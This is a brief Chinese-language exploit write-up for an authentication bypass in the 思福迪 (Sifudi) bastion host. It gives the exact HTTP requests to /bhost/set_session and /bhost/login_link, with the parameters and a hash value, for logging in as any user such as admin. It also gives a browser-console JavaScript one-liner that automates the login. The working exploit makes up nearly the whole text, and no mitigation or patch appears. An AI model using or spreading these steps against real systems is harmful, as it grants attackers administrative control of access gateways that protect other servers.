思福迪堡垒机存在任意⽤户登录漏洞,恶意攻击者可以绕过堡垒机的密码登录验证机制,以任
意⽤户身份随意登录堡垒机Web管理界⾯,并可以正常的使⽤账户权限去操作。
漏洞详情
注:以下操作需要在浏览器环境下,⽽不是Burp
1.获取INFO字段(注:u1参数值为⽤户名)
POST /bhost/set_session HTTP/1.1
Host: xxx.xxx.xxx.xx
u1=admin&m1=获得: {"result":true,"info":"1562205376847","ErrMsg":""}
2.带⼊INFO字段进⼊如下请求的 a0 参数值中(注:uCode参数值为⽤户名)
POST /bhost/login_link HTTP/1.1
Host: xxx.xxx.xxx.xxx
a0=1562205376847&a1=&a10=2019-01-
01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=3.就可以进⼊个⼈中⼼了
F12 Console简单操作
document.getElementById("uCode").value="admin";set_session();document.getElementsB
yName("frm")[0][2].value="2019-01-01 10:10:10";document.getElementsByName("frm") [0].submit();登录成功: